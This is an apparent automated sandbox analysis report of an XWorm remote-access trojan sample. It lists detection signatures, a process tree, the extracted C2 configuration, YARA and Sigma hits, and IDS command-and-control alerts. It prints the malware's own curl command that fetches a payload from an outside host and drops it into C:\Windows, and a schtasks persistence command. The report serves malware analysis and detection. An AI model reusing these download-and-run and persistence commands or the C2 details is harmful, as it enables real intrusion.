Windows Analysis Report
18sFhgSyVK.exe

Overview

General Information

Sample name: 18sFhgSyVK.exe (renamed because original name is a hash value)
Original sample name: 22bbc82f84857c93f15ceb787da8ab57bd25aed0b32ef16124644231b1d142fc.exe
Analysis ID: 1561587
MD5: 4e0d7812adef8e43e4eae77bf07dcc94
SHA1: 2499fdf4c66070ec1b4d7c4e499f6dbc56565767
SHA256: 22bbc82f84857c93f15ceb787da8ab57bd25aed0b32ef16124644231b1d142fc
Tags: exe, user-Chainskilabs

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Stores files to the Windows start menu directory
Uses curl to download other files
Yara signature match

Classification

  • System is w10x64
  • 18sFhgSyVK.exe (PID: 6400 cmdline: "C:\Users\user\Desktop\18sFhgSyVK.exe" MD5: 4E0D7812ADEF8E43E4EAE77BF07DCC94)
    • conhost.exe (PID: 2552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1768 cmdline: C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 7092 cmdline: curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • cmd.exe (PID: 6772 cmdline: C:\Windows\system32\cmd.exe /c color b MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 5936 cmdline: C:\Windows\system32\cmd.exe /c C:\Windows\StartMenuExperienceHost.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • StartMenuExperienceHost.exe (PID: 1456 cmdline: C:\Windows\StartMenuExperienceHost.exe MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
        • schtasks.exe (PID: 2936 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6368 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6756 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5772 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5428 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 7840 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7208 cmdline: C:\Users\user~1\AppData\Local\Temp\svchost.exe MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
  • svchost.exe (PID: 7432 cmdline: "C:\Users\user~1\AppData\Local\Temp\svchost.exe" MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
  • svchost.exe (PID: 7588 cmdline: "C:\Users\user~1\AppData\Local\Temp\svchost.exe" MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
  • svchost.exe (PID: 7668 cmdline: C:\Users\user~1\AppData\Local\Temp\svchost.exe MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
  • svchost.exe (PID: 8136 cmdline: C:\Users\user~1\AppData\Local\Temp\svchost.exe MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
  • svchost.exe (PID: 2324 cmdline: C:\Users\user~1\AppData\Local\Temp\svchost.exe MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
  • svchost.exe (PID: 5860 cmdline: C:\Users\user~1\AppData\Local\Temp\svchost.exe MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
  • cleanup
{"C2 url": ["127.0.0.1", "104.198.168.179"], "Port": 1337, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_XWorm_1 | Yara detected XWorm | Joe Security |
sslproxydump.pcap | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x10ce2:$s6: VirtualBox
  • 0x10bfa:$s8: Win32_ComputerSystem
  • 0x13b51:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x13bee:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x13d03:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x12d55:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\svchost.exe | JoeSecurity_TelegramRecon | Yara detected Telegram Recon | Joe Security |
C:\Windows\StartMenuExperienceHost.exe | JoeSecurity_TelegramRecon | Yara detected Telegram Recon | Joe Security |
C:\Users\user\AppData\Local\Temp\svchost.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
C:\Users\user\AppData\Local\Temp\svchost.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Windows\StartMenuExperienceHost.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |

Source | Rule | Description | Author | Strings
0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xec8b:$s6: VirtualBox
  • 0xebe9:$s8: Win32_ComputerSystem
  • 0x117f8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x11895:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x119aa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x10b14:$cnc4: POST / HTTP/1.1
0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |

Source | Rule | Description | Author | Strings
12.0.StartMenuExperienceHost.exe.b30000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
12.0.StartMenuExperienceHost.exe.b30000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
12.0.StartMenuExperienceHost.exe.b30000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
12.0.StartMenuExperienceHost.exe.b30000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xee8b:$s6: VirtualBox
  • 0xede9:$s8: Win32_ComputerSystem
  • 0x119f8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x11a95:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x11baa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x10d14:$cnc4: POST / HTTP/1.1

System Summary

Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\StartMenuExperienceHost.exe, ProcessId: 1456, TargetFilename: C:\Users\user\AppData\Local\Temp\svchost.exe
Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent, CommandLine: C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\18sFhgSyVK.exe", ParentImage: C:\Users\user\Desktop\18sFhgSyVK.exe, ParentProcessId: 6400, ParentProcessName: 18sFhgSyVK.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent, ProcessId: 1768, ProcessName: cmd.exe
Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent, CommandLine: C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\18sFhgSyVK.exe", ParentImage: C:\Users\user\Desktop\18sFhgSyVK.exe, ParentProcessId: 6400, ParentProcessName: 18sFhgSyVK.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent, ProcessId: 1768, ProcessName: cmd.exe
Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: C:\Users\user~1\AppData\Local\Temp\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\StartMenuExperienceHost.exe, ProcessId: 1456, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
Source: Process started; Author: David Burkett, @signalblur; Data: Command: C:\Users\user~1\AppData\Local\Temp\svchost.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\svchost.exe, ProcessId: 7208, ProcessName: svchost.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: C:\Users\user~1\AppData\Local\Temp\svchost.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\svchost.exe, ProcessId: 7208, ProcessName: svchost.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user~1\AppData\Local\Temp\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\StartMenuExperienceHost.exe, ProcessId: 1456, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Windows\StartMenuExperienceHost.exe, ProcessId: 1456, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\StartMenuExperienceHost.exe, ParentImage: C:\Windows\StartMenuExperienceHost.exe, ParentProcessId: 1456, ParentProcessName: StartMenuExperienceHost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe", ProcessId: 2936, ProcessName: schtasks.exe
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent, CommandLine: C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\18sFhgSyVK.exe", ParentImage: C:\Users\user\Desktop\18sFhgSyVK.exe, ParentProcessId: 6400, ParentProcessName: 18sFhgSyVK.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent, ProcessId: 1768, ProcessName: cmd.exe
Source: Process started; Author: frack113, Nasreddine Bencherchali; Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\StartMenuExperienceHost.exe, ParentImage: C:\Windows\StartMenuExperienceHost.exe, ParentProcessId: 1456, ParentProcessName: StartMenuExperienceHost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe", ProcessId: 2936, ProcessName: schtasks.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 6368, ProcessName: svchost.exe

Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\StartMenuExperienceHost.exe, ParentImage: C:\Windows\StartMenuExperienceHost.exe, ParentProcessId: 1456, ParentProcessName: StartMenuExperienceHost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe", ProcessId: 2936, ProcessName: schtasks.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-23T21:03:15.686107+0100 | 2853685 | 1 | A Network Trojan was detected | 192.168.2.7 | 49704 | 149.154.167.220 | 443 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-23T21:03:31.666395+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:03:35.005493+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:03:44.735562+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:03:57.811744+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:05.021284+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:10.892727+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:23.967438+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:31.734513+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:32.653666+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:35.036903+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:36.981287+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:48.781948+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:49.282930+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:52.904777+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:54.388194+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:54.589383+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:54.690403+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:54.801517+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:00.363403+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:00.564582+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:00.640704+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:00.760385+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:03.840384+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:05.053094+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:07.107572+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:07.308687+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:09.514457+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:12.481178+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:12.682711+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:12.939275+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:14.950023+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:26.887003+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:31.641024+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:35.069157+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:38.640134+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:38.949523+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:39.250891+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:39.497896+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:39.978714+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:44.551660+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:49.594079+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:50.497744+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:50.698991+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:51.591338+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:55.751418+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:00.701370+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:00.902763+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:01.878874+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:02.489633+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:05.390110+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:15.391981+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:16.150188+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:16.362651+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:16.550015+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:29.187457+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:34.374193+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:35.084989+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
